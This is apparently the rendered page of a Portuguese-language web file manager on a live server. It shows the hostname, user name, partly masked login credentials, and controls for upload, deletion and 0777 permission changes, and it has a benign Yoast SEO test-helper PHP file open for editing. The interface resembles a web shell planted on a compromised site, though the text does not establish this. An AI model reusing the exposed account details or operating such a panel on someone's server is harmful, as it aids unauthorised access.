🗂️ File Manager Pro
🖥️ Tipo de Hospedagem:
Vps
📁 Diretório Raiz:
/home
🌐 Servidor:
www.apm-abl.com
👤 Usuário:
apmablcosr
🔐 Sessão:
🔑 Credenciais:
adm_baf104b8 / f086****
📍 Localização Atual:
home
Caminho completo: /home
📤 Enviar Arquivo
📁 Nova Pasta
⬆️ Voltar
🏠 Raiz
🗑️ DELETAR
📦 ZIPAR/DEZIPAR
Status
Nome
Tamanho
Modificado
Permissões
Ações
📁 a
-
03/02/2026 22:15
0755
✏️
📁 apmablcosr
-
26/01/2026 16:35
0705
✏️
🗑️
Editando: local-seo.php
<?php namespace Yoast\WP\Test_Helper\WordPress_Plugins; /** * Class to represent Local SEO. */ class Local_SEO implements WordPress_Plugin { /** * Retrieves the plugin identifier. * * @return string The plugin identifier. */ public function get_identifier() { return 'wpseo-local'; } /** * Retrieves the plugin name. * * @return string The name of the plugin. */ public function get_name() { return 'Yoast SEO: Local'; } /** * Retrieves the version option name. * * @return string The name that holds the version. */ public function get_version_option_name() { return 'wpseo_local'; } /** * Retrieves the version key. * * @return string The version key. */ public function get_version_key() { return 'local_version'; } /** * Retrieves the options. * * @return array The options. */ public function get_options() { return [ $this->get_version_option_name() ]; } /** * Resets a feature. * * @param string $feature Feature to reset. * * @return bool True on success. */ public function reset_feature( $feature ) { return false; } /** * Retrieves the list of features. * * @return string[] List of features. */ public function get_features() { return []; } /** * Retrieves the active version of the plugin. * * @return string The current version of the plugin. */ public function get_version_constant() { return \defined( 'WPSEO_LOCAL_VERSION' ) ? \WPSEO_LOCAL_VERSION : \__( 'not active', 'yoast-test-helper' ); } }
💾 Salvar
❌ Cancelar
Enviar Arquivo
Selecionar arquivo:
Enviar
Cancelar
Criar Nova Pasta
Nome da pasta:
Criar
Cancelar
Alterar Permissões
Nova permissão:
0644 (rw-r--r--)
0755 (rwxr-xr-x)
0777 (rwxrwxrwx)
0600 (rw-------)
0700 (rwx------)
0444 (r--r--r--)
💾 Salvar
Cancelar